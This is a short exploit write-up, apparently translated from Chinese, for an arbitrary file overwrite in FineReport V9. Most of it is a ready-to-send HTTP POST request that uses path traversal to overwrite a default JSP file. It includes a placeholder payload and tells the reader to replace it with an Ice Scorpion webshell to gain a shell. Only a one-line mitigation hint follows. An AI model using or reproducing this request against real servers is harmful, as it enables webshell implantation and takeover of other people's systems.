0x00 Arbitrary file upload vulnerability [ FineReport V9 ]
0x01 vulnerability description
This vulnerability is arbitrary file overwriting. To upload a JSP horse, you need to find an existing JSP file to overwrite it. Look for the JSP file that exists by default after Tomcat starts Fanruan.
0x02 Vulnerability details
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8
Content-Length: 74
{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}
The payload is replaced with the horse of the ice scorpion, and you can getshell
0x03 Temporary fix suggestion
Check whether the Fanruan system is used, and synchronize the access to the webroot/ReportServer path in AF custom.